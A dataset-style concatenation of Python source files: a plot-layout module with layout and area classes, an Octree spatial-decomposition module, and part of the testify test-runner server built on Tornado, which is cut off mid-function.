                                 dtype = float).reshape((nrow, ncol),
                                                        order = order_str)
        # cells beyond the number of grobs stay empty
        inner_design[inner_design >= num_grobs] = np.nan
        _ = self._assess_mat(inner_design) # should pass since we just built it...
        return inner_design

    # property
    design = property(_get_design)
    """
    defines underlying ``design`` attribute (potentially defined relative to a
    ``cow.patch`` object if certain structure are not extremely specific.
    """

    def _assess_mat(self, design):
        """
        Assesses if the design matrix includes at least 1 box for patches
        indexed 0 to (number of patches - 1). This doesn't actually assume to know
        the number of patches.

        Arguments
        ---------
        design : np.array (integer)
            design in numpy array format

        Returns
        -------
        int
            number of patches expected in the overall matrix.

        Raises
        ------
        ValueError
            if design matrix doesn't include at least at least 1 box for all
            indices between 0 to (number of patches - 1)
        """
        if design is None:
            return None # to identify later that we don't have a design matrix
        unique_vals = np.unique(design)
        unique_vals = np.sort(
            unique_vals[np.logical_not(np.isnan(unique_vals))])
        num_unique = unique_vals.shape[0]
        # indices must be exactly 0, 1, ..., num_unique-1 (no gaps)
        if not np.allclose(unique_vals, np.arange(num_unique)):
            raise ValueError("design input requires values starting "+\
                             "with 0/A and through integer/alphabetical "+\
                             "value expected for the number of patches "+\
                             "provided")
        return num_unique

    def _rel_structure(self, num_grobs=None):
        """
        provide rel_structure (rel_widths, rel_heights) if missing

        Arguments
        ---------
        num_grobs : int
            if not None, then this value will be used to understand the number
            of grobs to be laid out

        Returns
        -------
        rel_widths : np.array vector
            a vector of relative widths of the columns of the layout design
        rel_heights : np.array vector
            a vector of relative heights of the rows of the layout design
        """
        if num_grobs is None:
            if not (self.ncol is not None and \
                    self.nrow is not None) and \
               not (self.rel_widths is not None and \
                    self.rel_heights is not None):
                raise ValueError("unclear number of grobs in layout -> "+\
                                 "unable to identify relative width and height")
        rel_widths = self.rel_widths
        rel_heights = self.rel_heights
        ncol = self.ncol
        nrow = self.nrow
        # derive counts from the relative vectors when available
        if rel_widths is not None and ncol is None:
            ncol = rel_widths.shape[0]
        if rel_heights is not None and nrow is None:
            nrow = rel_heights.shape[0]
        if ncol is None:
            ncol = int(np.ceil(num_grobs/nrow))
        if rel_widths is None:
            rel_widths = np.ones(ncol)
        if nrow is None:
            nrow = int(np.ceil(num_grobs/ncol))
        if rel_heights is None:
            rel_heights = np.ones(nrow)
        return rel_widths, rel_heights

    def _element_locations(self, width_pt, height_pt, num_grobs=None):
        """
        create a list of ``area`` objects associated with the location of
        each of the layout's grobs w.r.t. a given points width and height

        Arguments
        ---------
        width_pt : float
            global width (in points) of the full arangement of patches
        height_pt : float
            global height (in points) of the full arangement of patches
        num_grobs : integer
            if not ``None``, then this value will be used to understand the
            number of grobs to be laid out

        Returns
        -------
        list
            list of ``area`` objects describing the location for each of the
            layout's grobs (in the order of the index in the self.design)
        """
        if self.num_grobs is None and num_grobs is None:
            raise ValueError("unclear number of grobs in layout...")
        if self.num_grobs is not None:
            if num_grobs is not None and num_grobs != self.num_grobs:
                warnings.warn("_element_locations overrides num_grobs "+\
                              "with self.num_grobs")
            num_grobs = self.num_grobs
        rel_widths, rel_heights = self._rel_structure(num_grobs=num_grobs)
        areas = []
        for p_idx in np.arange(num_grobs):
            # bounding box of this grob's index within the design matrix
            dmat_logic = self._get_design(num_grobs=num_grobs) == p_idx
            r_logic = dmat_logic.sum(axis=1) > 0
            c_logic = dmat_logic.sum(axis=0) > 0
            inner_x_where = np.argwhere(c_logic)
            inner_x_left = np.min(inner_x_where)
            inner_x_right = np.max(inner_x_where)
            inner_width = inner_x_right - inner_x_left + 1
            inner_x_where = np.argwhere(r_logic)
            inner_y_top = np.min(inner_x_where)
            inner_y_bottom = np.max(inner_x_where)
            inner_height = inner_y_bottom - inner_y_top + 1
            inner_design_area = area(x_left = inner_x_left,
                                     y_top = inner_y_top,
                                     width = inner_width,
                                     height = inner_height,
                                     _type = "design")
            # convert design-grid units to points for the caller
            areas.append(inner_design_area.pt(rel_widths=rel_widths,
                                              rel_heights=rel_heights,
                                              width_pt=width_pt,
                                              height_pt=height_pt))
        return areas

    def _yokogaki_ordering(self, num_grobs=None):
        """
        calculates the yokogaki (left to right, top to bottom) ordering
        the the patches

        Arguments
        ---------
        num_grobs : integer
            if not ``None``, then this value will be used to understand the
            number of grobs to be laid out

        Returns
        -------
        numpy array (vector) of integer index of plots in yokogaki ordering

        Notes
        -----
        Yokogaki is a Japanese word that concisely describes the left to right,
        top to bottom writing format. We'd like to thank `stack overflow`_.
        for pointing this out.

        .. _stack overflow:
            https://english.stackexchange.com/questions/81520/is-there-a-word-for-left-to-right-and-top-to-bottom
        """
        if self.num_grobs is None and num_grobs is None:
            raise ValueError("unclear number of grobs in layout...")
        if self.num_grobs is not None:
            if num_grobs is not None and num_grobs != self.num_grobs:
                warnings.warn("_element_locations overrides num_grobs "+\
                              "with self.num_grobs")
            num_grobs = self.num_grobs
        # NOTE(review): _element_locations(1,1) is called without forwarding
        # num_grobs, so this raises when self.num_grobs is None even though a
        # num_grobs argument was supplied -- confirm intended.
        areas = self._element_locations(1,1) # basically getting relative positions (doesn't matter) - nor does it matter about rel_height and width, but ah well
        all_x_left = np.array([a.x_left for a in areas])
        all_y_top = np.array([a.y_top for a in areas])
        index_list = np.arange(num_grobs)
        yokogaki_ordering = []
        # remember y_tops are w.r.t top axis
        for y_val in np.sort(np.unique(all_y_top)):
            given_row_logic = all_y_top == y_val
            inner_index = index_list[given_row_logic]
            inner_x_left = all_x_left[given_row_logic]
            # within a row, order left to right
            row_ids = inner_index[np.argsort(inner_x_left)]
            yokogaki_ordering += list(row_ids)
        return np.array(yokogaki_ordering)

    def __hash__(self):
        """
        Creates a 'unique' hash for the object to help with identification

        Returns
        -------
        hash integer
        """
        # missing pieces are represented by a [None] placeholder so that
        # layouts with/without a design hash differently
        if self.num_grobs is None:
            design_list = [None]
        else:
            design_list = list(self.design.ravel())
        rw_list = [None]
        if self.rel_widths is not None:
            rw_list = list(self.rel_widths)
        rh_list = [None]
        if self.rel_heights is not None:
            rh_list = list(self.rel_heights)
        info_list = design_list + \
            rw_list + rh_list +\
            [self.ncol, self.nrow, self.num_grobs]
        return abs(hash(tuple(info_list)))

    def __str__(self):
        """Short tag containing the object's hash."""
        return "<layout (%d)>" % self.__hash__()

    def __repr__(self):
        """Multi-line description: design matrix plus relative widths/heights."""
        nrow_str = str(self.nrow)
        if self.nrow is None:
            nrow_str = "unk"
        ncol_str = str(self.ncol)
        if self.ncol is None:
            ncol_str = "unk"
        if self.num_grobs is None:
            design_str = "*unk*"
        else:
            design_str = self.design.__str__()
        rw_str = "unk"
        if self.rel_widths is not None:
            rw_str = self.rel_widths.__str__()
        rh_str = "unk"
        if self.rel_heights is not None:
            rh_str = self.rel_heights.__str__()
        out = "design (%s, %s):\n\n"% (nrow_str, ncol_str) +\
            design_str +\
            "\n\nwidths:\n" +\
            rw_str +\
            "\nheights:\n" +\
            rh_str
        return self.__str__() + "\n" + out

    def __eq__(self, value):
        """
        checks if object is equal to another object (value)

        Arguments
        ---------
        value : object
            another object (that major or may not be of the layout class)

        Returns
        -------
        boolean
            if current object and other object (value) are equal
        """
        # if value is not a layout...
        if not inherits(value, layout):
            return False
        # if __design hasn't been specified on 1 but is on another
        if (self.__design is None and value.__design is not None) or\
                (self.__design is not None and value.__design is None):
            return False
        # accounting for lack of __design specification
        design_logic = True
        if self.__design is not None:
            design_logic = np.allclose(self.design,value.design,equal_nan=True)
        # relative sizes are compared up to a common scale factor
        # NOTE(review): this raises TypeError when rel_heights/rel_widths is
        # None on either side -- confirm layouts always carry these here.
        return design_logic and \
            self.ncol == value.ncol and \
            self.nrow == value.nrow and \
            np.unique(self.rel_heights/value.rel_heights).shape[0] == 1 and \
            np.unique(self.rel_widths/value.rel_widths).shape[0] == 1
class area:
def __init__(self,
x_left, y_top,
width, height,
_type):
"""
object that stores information about what area a ``patch`` will fill
Arguments
---------
x_left : float
scalar of where the left-most point of the patch is located (impacted
by the ``_type`` parameter)
y_top : float
scalar of where the top-most point of the patch is located (impacted
by the ``_type`` parameter)
width : float
scalar of the width of the patch (impacted by the ``_type``
parameter)
height : float
scalar of the height of the patch (impacted by the ``_type``
parameter)
_type : str {"design", "relative", "pt"}
describes how the parameters are stored. See Notes for more
information between the options.
Notes
-----
These objects provide structural information about where in the overall
arangement individual plots / sub arangments lie.
The ``_type`` parameter informs how to understand the other parameters:
1. "design" means that the values are w.r.t. to a design matrix
relative to the `layout` class, and values are relative to the rows
and columns units.
2. "relative" means the values are defined relative to the full size of
the canvas and taking values between 0-1 (inclusive).
3. "pt" means that values are defined relative to point values
See also
--------
layout : object that incorporates multiple area definitions to define
layouts.
"""
# some structure check:
self._check_info_wrt_type(x_left, y_top, width, height, _type)
self.x_left = x_left
self.y_top = y_top
self.width = width
self.height = height
self._type = _type
def _check_info_wrt_type(self, x_left, y_top, width, height, _type):
"""
some logic checks of inputs relative to ``_type`` parameter
Arguments
---------
x_left : float
scalar of where the left-most point of the patch is located
(impacted by the ``_type`` parameter)
y_top : float
scalar of where the top-most point of the patch is located
(impacted by the ``_type`` parameter)
width : float
scalar of the width of the patch (impacted by the ``_type``
parameter)
height : float
scalar of the height of the patch (impacted by the ``_type``
parameter)
_type : str {"design", "relative", "pt"}
describes how the parameters are stored. Options include
["design", "relative", "pt"]. See class docstring for more info
Raises
------
ValueError
if any of the first four parameters don't make sense with respect
to the ``_type`` parameter
"""
if _type not in ["design", "relative", "pt"]:
raise ValueError("_type parameter not an acceptable option, see"+\
" documentation")
if _type == "design" and \
not np.all([is_non_neg_int(val) for val in [x_left,y_top]] +\
[is_pos_int(val) for val in [width,height]]) :
raise ValueError("with _type=\"design\", all parameters must be "+\
"positive integers")
elif _type == "relative" and \
not np.all([is_proportion(val) for val in [x_left,y_top,
width,height]] +\
[is_positive(val) for val in [width,height]]):
raise ValueError("with _type=\"relative\", all parameters should"+\
" be between 0 and 1 (inclusive) and width and"+\
" height cannot be 0")
elif _type == "pt" and \
not np.all([is_non_negative(val) for val in [x_left,y_top]] +\
[is_positive(val) for val in [width,height]]):
raise ValueError("with _type=\"pt\", all x_left and y_top should"+\
" be non-negative and width and height should"+\
" be strictly positive")
def _design_to_relative(self, rel_widths, rel_heights):
"""
translates an area object with ``_type`` = "design" to area object
with ``_type`` = "relative".
Arguments
---------
rel_widths : np.array (vector)
list of relative widths of each column of the layout matrix
rel_heights : np.array (vector)
list of relative heights of each row of the layout matrix
Returns
-------
area object
area object of ``_type`` = "relative"
"""
rel_widths = rel_widths/np.sum(rel_widths)
rel_heights = rel_heights/np.sum(rel_heights)
x_left = np.sum(rel_widths[:(self.x_left)])
y_top = np.sum(rel_heights[:(self.y_top)])
width = np.sum(rel_widths[self.x_left:(self.x_left + self.width)])
height = np.sum(rel_heights[self.y_top:(self.y_top + self.height)])
rel_area = area(x_left=x_left,
y_top=y_top,
width=width,
height=height,
_type="relative")
return rel_area
def _relative_to_pt(self, width_pt, height_pt):
"""
translates an area object with ``_type`` = "relative" to area object
with ``_type`` = "pt".
Arguments
---------
width_pt : float
width in points
height_pt : float
height in points
Returns
-------
area object
area object of ``_type`` = "pt"
"""
return area(x_left = self.x_left * width_pt,
y_top = self.y_top * height_pt,
width = self.width * width_pt,
height = self.height * height_pt,
_type = "pt")
def pt(self,
width_pt=None,
height_pt=None,
rel_widths=None,
rel_heights=None
):
"""
Translates area object to ``_type`` = "pt"
Arguments
---------
width_pt : float
width in points (required if ``_type`` is not "pt")
height_pt : float
height in points (required if ``_type`` is not "pt")
rel_widths : np.array (vector)
list of relative widths of each column of the layout matrix
(required if ``_type`` is "design")
rel_heights : np.array (vector)
list of relative heights of each row of the layout matrix
(required if ``_type`` is "design")
Returns
-------
area object
area object of ``_type`` = "pt"
"""
if self._type == "design":
rel_area = self._design_to_relative(rel_widths = rel_widths,
rel_heights = rel_heights)
return rel_area.pt(width_pt = width_pt, height_pt = height_pt)
elif self._type == "relative":
return self._relative_to_pt(width_pt = width_pt,
height_pt = height_pt)
elif self._type == "pt":
return copy.deepcopy(self)
else:
raise ValueError("_type attributes altered to a non-acceptable"+\
" value")
def _hash(self):
"""
replacement function for ``__hash__`` due to equality conflicts
Notes
-----
required since we defined ``__eq__`` and this conflicts with the
standard ``__hash__``
"""
return hash((self.x_left, self.y_top,
self.width, self.height,
self._type))
def __str__(self):
return "<area (%d)>" % self._hash()
def __repr__(self):
out = "_type: " + self._type +\
"\n\nx_left: " +\
self.x_left.__str__() +\
"\ny_top: " +\
self.y_top.__str__() +\
"\nwidth: " +\
self.width.__str__() +\
"\nheight: " +\
self.height.__str__()
return self.__str__() + "\n" + out
def __eq__(self, value):
return type(self) == type(value) and \
np.allclose(np.array([self.x_left, self.y_top,
self.width, self.height]),
np.array([value.x_left, value.y_top,
value.width, value.height])) and \
self._type == value._type
| StarcoderdataPython |
102022 | '''
Classes to represent axis-aligned 3-D bounding boxes and 3-D line segments, and
to perform ray-tracing based on oct-tree decompositions or a linear marching
algorithm.
'''
# Copyright (c) 2015 <NAME>. All rights reserved.
# Restrictions are listed in the LICENSE file distributed with this package.
from .cytools.boxer import *
class Octree(object):
    '''
    A multilevel oct-tree decomposition of a three-dimensional space,
    wherein each level has a Box3D root defining its limits, and contains
    up to eight Octree children (each representing an octant of the root).

    Leafy children (those children of level 0) can be added to the tree
    recursively and need not be Box3D objects.
    '''
    def __init__(self, level, box):
        '''
        Construct an oct tree with a depth of level. The created tree
        has a rootbox property that is a Box3D object with lo and hi
        bounds copied from the provided Box3D box. For levels greater
        than 0, the rootbox is subdivided into (2, 2, 2) octant cells.
        Each octant cell will be the rootBox for one child, but
        children are created lazily when leaves are added with the
        Octree.addleaves.

        When created, descendants will be accumulated in the children
        property of this object. For levels greater than 0, children is
        a dictionary that maps octant indices (i, j, k), where each
        index can take the value 0 or 1, to an Octree instance that
        represents a branch at (level - 1). For level-0 trees, children
        is just a set of arbitrary objects.
        '''
        self.level = int(level)
        if self.level != level:
            raise TypeError('Argument level must be an integer')
        if self.level < 0:
            raise ValueError('Argument level must be nonnegative')
        self.rootbox = Box3D(box.lo, box.hi)
        # At level 0, children (leaves) are stored in a set
        if self.level < 1:
            self.children = set()
            return
        # Subdivide the root into octants
        self.rootbox.ncell = (2, 2, 2)
        # Children of nonzero levels are stored in a dictionary
        self.children = { }
    def prune(self):
        '''
        Recursively remove all children that, themselves, have no
        children. For level-0 trees, this is a no-op.
        '''
        if self.level < 1: return
        # Keep track of empty children
        nokids = set()
        for k, v in self.children.items():
            # Prune the child to see if it is empty
            v.prune()
            if not v.children: nokids.add(k)
        for idx in nokids:
            try: del self.children[idx]
            except KeyError: pass
    def branchForKey(self, *key):
        '''
        Query this tree for the branch (an Octree object) identified by
        the provided key. The key, which must be a sequence, can be
        provided as unpacked arguments or as a single argument.

        The length of the key must be a multiple of three. If the key
        is empty, self is returned. If the key is not empty, it is
        split as

            child = key[:3]
            subkey = key[3:]

        and a recursive result is returned by calling

            self.children[child].branchForKey(subkey).

        If a branch for the given child key does not exist, but the
        child key represents a valid octant, the branch is created.

        If the child key does not represent a valid octant, either
        because the key has a length other than 0 or 3, or because the
        child key contains values other than 0 or 1, a KeyError will be
        raised. At level 0, any nonempty key will raise a KeyError.
        '''
        # Treat a single argument as a packed index
        if len(key) == 1: key = key[0]
        try:
            child = tuple(key[:3])
            subkey = key[3:]
        except TypeError:
            raise KeyError('Single argument must be a sequence')
        if not len(child): return self
        if self.level < 1:
            raise KeyError('Key length greater than tree depth')
        elif len(child) != 3:
            raise KeyError('Key length must be a multiple of three')
        if set(child).difference({ 0, 1 }):
            raise KeyError('Indices of key must be 0 or 1')
        try: ctree = self.children[child]
        except KeyError:
            # Lazily create the missing branch for this octant
            cbox = self.rootbox.getCell(*child)
            ctree = Octree(self.level - 1, cbox)
            self.children[child] = ctree
        return ctree.branchForKey(subkey)
    def addleaves(self, leaves, predicate, multibox=False):
        '''
        From the iterable leaves, populate the children of all level-0
        branches in the Octree hierarchy according to the value of the
        given predicate. If any branches are missing from the tree,
        they will be created as necessary. Leaf objects must be
        hashable.

        The predicate must be a callable that takes two positional
        arguments, box and leaf, and returns True iff the specified
        Box3D box contains the leaf. The predicate will be called for
        boxes at every level of the tree while drilling down.

        If multibox is True, all level-0 boxes that satisfy the
        predicate for a given leaf will record the leaf as a child.
        Otherwise, only the first box to satisfy the predicate will own
        the box. The tree is walked depth-first, with children
        encountered in the order determined by Box3D.allIndices.

        If no box contains an entry in leaves, that entry will be
        silently ignored.

        This method returns True if any leaf was added to the tree,
        False otherwise.
        '''
        rbox = self.rootbox
        added = False
        for leaf in leaves:
            # Check whether the leaf belongs in this tree
            if not predicate(rbox, leaf): continue
            if self.level < 1:
                # Just add the children at the finest level
                self.children.add(leaf)
                added = True
                continue
            # At higher levels, try to add the leaf to children
            for idx in rbox.allIndices():
                # Grab or create a child tree
                ctree = self.branchForKey(idx)
                # Add the leaf to the child tree, if possible
                if ctree.addleaves((leaf,), predicate, multibox):
                    added = True
                    if not multibox: break
        return added
    def mergeleaves(self, leaves):
        '''
        For each key-value pair leaves, a mapping from branch keys to
        sets of leaf objects (in the same form produced by the method
        Octree.getleaves), add all leaf objects in the set to the
        level-0 branch indicated by the corresponding key.

        A KeyError will be raised without adding leaves if any keys
        in the mapping fail to specify valid level-0 Octree branches.
        Some intermediate branches may be added even if leaves are not
        added, but the added branches will be empty in this case.

        The same leaf object will be added to multiple level-0 branches
        if the object is specified for multiple keys in the leaves
        mapping.
        '''
        # Produce a list of (child, leaf-set) pairs for validation
        bpairs = [ (self.branchForKey(key), set(lset))
                for key, lset in leaves.items() ]
        # Ensure all branches are at level 0
        if any(branch.level for branch, lset in bpairs):
            # fixed typo in this message ("idenify" -> "identify")
            raise KeyError('Branch keys in leaves mapping must identify level-0 children')
        # Add all of the children
        for branch, lset in bpairs: branch.children.update(lset)
    def getleaves(self):
        '''
        Return a mapping from addresses to leaf sets such that, for a
        key-value pair (key, leaves) in the mapping, the branch
        returned by self.branchForkey(key) is a level-0 Octree and
        self.branchForKey(key).children == leaves.
        '''
        if self.level < 1:
            # At the lowest level, the address is empty
            return { (): set(self.children) }
        # Build the mapping up for all children
        return { tuple(key) + ck: cv
                for key, ctree in self.children.items()
                for ck, cv in ctree.getleaves().items() }
    def search(self, boxpred, leafpred=None, leafcache=None):
        '''
        Perform a depth-first search of the tree to identify matching
        leaves. A leaf is said to match the search iff the Boolean
        value of leafpred(leaf) is True and the Boolean value
        of boxpred(box) is True for the level-0 box that contains the
        leaf and for all of its ancestors.

        The order in which children are followed is arbitrary.

        The callable boxpred should take a single Box3D argument, which
        will be the root of some branch of the Octree. If the Boolean
        value of boxpred(box) is True for some box, the branch rooted
        on the box will be further searched. Otherwise, searching will
        terminate without checking descendants.

        The optional callable leafpred should take as its sole argument
        a leaf object previously assigned to the tree using the method
        Octree.addleaves. If leafpred is not defined, the default
        implementation returns True for every leaf.

        If leafcache is provided, it must be a dictionary. When
        attempting to match leaves in the search, the value of
        leafcache[leaf] will be used as a substitute for the value of
        leafpred(leaf) whenever possible. If leaf is not in leafcache,
        the value leafpred(leaf) will be assigned to leafcache[leaf].
        This capability is useful to avoid redundant match tests for
        leaves added in "multibox" mode and guarantees that
        leafpred(leaf) will be evaluated at most once for each leaf.

        The return value will be a dictionary mapping all leaf objects
        that match the search to the value returned by leafpred(leaf)
        or leafcache[leaf].
        '''
        # Match is empty if the box predicate fails
        if not boxpred(self.rootbox): return { }
        if self.level > 0:
            # Recursively check branches
            results = { }
            for ctree in self.children.values():
                results.update(ctree.search(boxpred, leafpred, leafcache))
            return results
        # With no leaf predicate, all leaves match
        if not leafpred: return { c: True for c in self.children }
        # Otherwise, filter leaves by the leaf predicate
        results = { }
        for c in self.children:
            if leafcache is not None:
                try:
                    lp = leafcache[c]
                except KeyError:
                    lp = leafpred(c)
                    leafcache[c] = lp
            else: lp = leafpred(c)
            if lp: results[c] = lp
        return results
| StarcoderdataPython |
138133 | <filename>testify/test_runner_server.py
# vim: et ts=4 sts=4 sw=4
"""
Client-server setup to evenly distribute tests across multiple processes. The server
discovers all test classes and enqueues them, then clients connect to the server,
receive tests to run, and send back their results.
The server keeps track of the overall status of the run and manages timeouts and retries.
"""
from __future__ import with_statement
from test_runner import TestRunner
import tornado.httpserver
import tornado.ioloop
import tornado.web
try:
import simplejson as json
_hush_pyflakes = [json]
del _hush_pyflakes
except ImportError:
import json
import logging
import Queue
import time
import itertools
class AsyncDelayedQueue(object):
    """Pair of priority queues that pair queued tests ("data") with queued
    consumer callbacks on the tornado IOLoop.

    Entries in data_queue are (priority, test_dict) tuples; entries in
    callback_queue are (priority, callback, runner) tuples. match() is
    scheduled on the IOLoop whenever either side gains an entry.
    """
    def __init__(self):
        # Pending tests, as (priority, data) tuples.
        self.data_queue = Queue.PriorityQueue()
        # Pending consumers, as (priority, callback, runner) tuples.
        self.callback_queue = Queue.PriorityQueue()
        # Once True, every queued and future callback is answered (None, None).
        self.finalized = False
    def get(self, c_priority, callback, runner=None):
        """Queue up a callback to receive a test."""
        # After finalize(), callers are told immediately that nothing is left.
        if self.finalized:
            callback(None, None)
            return
        self.callback_queue.put((c_priority, callback, runner))
        tornado.ioloop.IOLoop.instance().add_callback(self.match)
    def put(self, d_priority, data):
        """Queue up a test to get given to a callback."""
        self.data_queue.put((d_priority, data))
        tornado.ioloop.IOLoop.instance().add_callback(self.match)
    def match(self):
        """Try to pair a test to a callback.

        This loops over each queued callback (and each queued test)
        trying to find a match. It breaks out of the loop as soon as
        it finds a valid callback-test match, re-queueing anything it
        skipped. (In the worst case, this is O(n^2), but most of the
        time no loop iterations beyond the first will be necessary -
        the vast majority of the time, the first callback will match
        the first test).
        """
        callback = None
        runner = None
        data = None
        skipped_callbacks = []
        while callback is None:
            try:
                c_priority, callback, runner = self.callback_queue.get_nowait()
            except Queue.Empty:
                break
            skipped_tests = []
            while data is None:
                try:
                    d_priority, data = self.data_queue.get_nowait()
                except Queue.Empty:
                    break
                # A runner never receives the same test class it just ran;
                # such tests are set aside and restored below.
                if runner is not None and data.get('last_runner') == runner:
                    skipped_tests.append((d_priority, data))
                    data = None
                    continue
            # Restore any tests this callback had to skip over.
            for skipped in skipped_tests:
                self.data_queue.put(skipped)
            if data is None:
                # No compatible test for this callback; try the next one.
                skipped_callbacks.append((c_priority, callback, runner))
                callback = None
                continue
        # Restore callbacks that found no compatible test.
        for skipped in skipped_callbacks:
            self.callback_queue.put(skipped)
        if callback is not None:
            callback(d_priority, data)
            # A pairing succeeded, so another one may be possible: retry.
            tornado.ioloop.IOLoop.instance().add_callback(self.match)
    def empty(self):
        """Returns whether or not we have any pending tests."""
        # True when NO tests are queued (standard Queue.empty() semantics).
        return self.data_queue.empty()
    def waiting(self):
        """Returns whether or not we have any pending callbacks."""
        # NOTE(review): this returns True when the callback queue is EMPTY,
        # which is the opposite of what the name and docstring suggest;
        # confirm intent with callers before changing.
        return self.callback_queue.empty()
    def finalize(self):
        """Immediately call any pending callbacks with None,None
        and ensure that any future get() calls do the same."""
        self.finalized = True
        try:
            # Drain every queued callback, telling each there is no work.
            while True:
                _, callback, _ = self.callback_queue.get_nowait()
                callback(None, None)
        except Queue.Empty:
            pass
class TestRunnerServer(TestRunner):
def __init__(self, *args, **kwargs):
self.serve_port = kwargs.pop('serve_port')
self.runner_timeout = kwargs['options'].runner_timeout
self.revision = kwargs['options'].revision
self.server_timeout = kwargs['options'].server_timeout
self.shutdown_delay_for_connection_close = kwargs['options'].shutdown_delay_for_connection_close
self.shutdown_delay_for_outstanding_runners = kwargs['options'].shutdown_delay_for_outstanding_runners
self.test_queue = AsyncDelayedQueue()
self.checked_out = {} # Keyed on class path (module class).
self.failed_rerun_methods = set() # Set of (class_path, method) who have failed.
self.timeout_rerun_methods = set() # Set of (class_path, method) who were sent to a client but results never came.
self.previous_run_results = {} # Keyed on (class_path, method), values are result dictionaries.
self.runners = set() # The set of runner_ids who have asked for tests.
self.runners_outstanding = set() # The set of runners who have posted results but haven't asked for the next test yet.
self.shutting_down = False # Whether shutdown() has been called.
super(TestRunnerServer, self).__init__(*args, **kwargs)
def get_next_test(self, runner_id, on_test_callback, on_empty_callback):
"""Enqueue a callback (which should take one argument, a test_dict) to be called when the next test is available."""
self.runners.add(runner_id)
def callback(priority, test_dict):
if not test_dict:
return on_empty_callback()
if test_dict.get('last_runner', None) != runner_id or (self.test_queue.empty() and len(self.runners) <= 1):
self.check_out_class(runner_id, test_dict)
on_test_callback(test_dict)
else:
if self.test_queue.empty():
# Put the test back in the queue, and queue ourselves to pick up the next test queued.
self.test_queue.put(priority, test_dict)
self.test_queue.callback_queue.put((-1, callback))
else:
# Get the next test, process it, then place the old test back in the queue.
self.test_queue.get(0, callback, runner=runner_id)
self.test_queue.put(priority, test_dict)
self.test_queue.get(0, callback, runner=runner_id)
def report_result(self, runner_id, result):
class_path = '%s %s' % (result['method']['module'], result['method']['class'])
d = self.checked_out.get(class_path)
if not d:
raise ValueError("Class %s not checked out." % class_path)
if d['runner'] != runner_id:
raise ValueError("Class %s checked out by runner %s, not %s" % (class_path, d['runner'], runner_id))
if result['method']['name'] not in d['methods']:
raise ValueError("Method %s not checked out by runner %s." % (result['method']['name'], runner_id))
if result['success']:
d['passed_methods'][result['method']['name']] = result
else:
d['failed_methods'][result['method']['name']] = result
self.failure_count += 1
if self.failure_limit and self.failure_count >= self.failure_limit:
logging.error('Too many failures, shutting down.')
return self.early_shutdown()
d['timeout_time'] = time.time() + self.runner_timeout
d['methods'].remove(result['method']['name'])
if not d['methods']:
self.check_in_class(runner_id, class_path, finished=True)
def run(self):
class TestsHandler(tornado.web.RequestHandler):
@tornado.web.asynchronous
def get(handler):
runner_id = handler.get_argument('runner')
if self.shutting_down:
self.runners_outstanding.discard(runner_id)
return handler.finish(json.dumps({
'finished': True,
}))
if self.revision and self.revision != handler.get_argument('revision'):
return handler.send_error(409, reason="Incorrect revision %s -- server is running revision %s" % (handler.get_argument('revision'), self.revision))
def callback(test_dict):
self.runners_outstanding.discard(runner_id)
handler.finish(json.dumps({
'class': test_dict['class_path'],
'methods': test_dict['methods'],
'finished': False,
}))
def empty_callback():
self.runners_outstanding.discard(runner_id)
handler.finish(json.dumps({
'finished': True,
}))
self.get_next_test(runner_id, callback, empty_callback)
def finish(handler, *args, **kwargs):
super(TestsHandler, handler).finish(*args, **kwargs)
tornado.ioloop.IOLoop.instance().add_callback(handler.after_finish)
def after_finish(handler):
if self.shutting_down and not self.runners_outstanding:
iol = tornado.ioloop.IOLoop.instance()
iol.add_callback(iol.stop)
class ResultsHandler(tornado.web.RequestHandler):
def post(handler):
runner_id = handler.get_argument('runner')
self.runners_outstanding.add(runner_id)
result = json.loads(handler.request.body)
try:
self.report_result(runner_id, result)
except ValueError, e:
return handler.send_error(409, reason=str(e))
return handler.finish("kthx")
def get_error_html(handler, status_code, **kwargs):
reason = kwargs.pop('reason', None)
if reason:
return reason
else:
return super(ResultsHandler, handler).get_error_html(status_code, **kwargs)
# Enqueue all of our tests.
for test_instance in self.discover():
test_dict = {
'class_path' : '%s %s' % (test_instance.__module__, test_instance.__class__.__name__),
'methods' : [test.__name__ for test in test_instance.runnable_test_methods()],
}
if test_dict['methods']:
self.test_queue.put(0, test_dict)
# Start an HTTP server.
application = tornado.web.Application([
(r"/tests", TestsHandler),
(r"/results", ResultsHandler),
])
server = tornado.httpserver.HTTPServer(application)
server.listen(self.serve_port)
def timeout_server():
if time.time() > self.last_activity_time + self.server_timeout:
logging.error('No client activity for %ss, shutting down.' % self.server_timeout)
self.shutdown()
else:
tornado.ioloop.IOLoop.instance().add_timeout(self.last_activity_time + self.server_timeout, timeout_server)
self.activity()
timeout_server() # Set the first callback.
tornado.ioloop.IOLoop.instance().start()
report = [reporter.report() for reporter in self.test_reporters]
return all(report)
def activity(self):
self.last_activity_time = time.time()
def check_out_class(self, runner, test_dict):
self.activity()
self.checked_out[test_dict['class_path']] = {
'runner' : runner,
'class_path' : test_dict['class_path'],
'methods' : set(test_dict['methods']),
'failed_methods' : {},
'passed_methods' : {},
'start_time' : time.time(),
'timeout_time' : time.time() + self.runner_timeout,
}
self.timeout_class(runner, test_dict['class_path'])
def check_in_class(self, runner, class_path, timed_out=False, finished=False, early_shutdown=False):
if not timed_out:
self.activity()
if 1 != len([opt for opt in (timed_out, finished, early_shutdown) if opt]):
raise ValueError("Must set exactly one of timed_out, finished, or early_shutdown.")
if class_path not in self.checked_out:
raise ValueError("Class path %r not checked out." % class_path)
if not early_shutdown and self.checked_out[class_path]['runner'] != runner:
raise ValueError("Class path %r not checked out by runner %r." % (class_path, runner))
d = self.checked_out.pop(class_path)
for method, result_dict in itertools.chain(
d['passed_methods'].iteritems(),
((method, result) for (method, result) in d['failed_methods'].iteritems() if early_shutdown or (class_path, method) in self.failed_rerun_methods),
):
for reporter in self.test_reporters:
result_dict['previous_run'] = self.previous_run_results.get((class_path, method), None)
reporter.test_start(result_dict)
reporter.test_complete(result_dict)
#Requeue failed tests
requeue_dict = {
'last_runner' : runner,
'class_path' : d['class_path'],
'methods' : [],
}
for method, result_dict in d['failed_methods'].iteritems():
if (class_path, method) not in self.failed_rerun_methods:
requeue_dict['methods'].append(method)
self.failed_rerun_methods.add((class_path, method))
result_dict['previous_run'] = self.previous_run_results.get((class_path, method), None)
self.previous_run_results[(class_path, method)] = result_dict
if finished:
if len(d['methods']) != 0:
raise ValueError("check_in_class called with finished=True but this class (%s) still has %d methods without results." % (class_path, len(d['methods'])))
elif timed_out:
# Requeue or report timed-out tests.
for method in d['methods']:
# Fake the results dict.
error_message = "The runner running this method (%s) didn't respond within %ss.\n" % (runner, self.runner_timeout)
module, _, classname = class_path.partition(' ')
result_dict = {
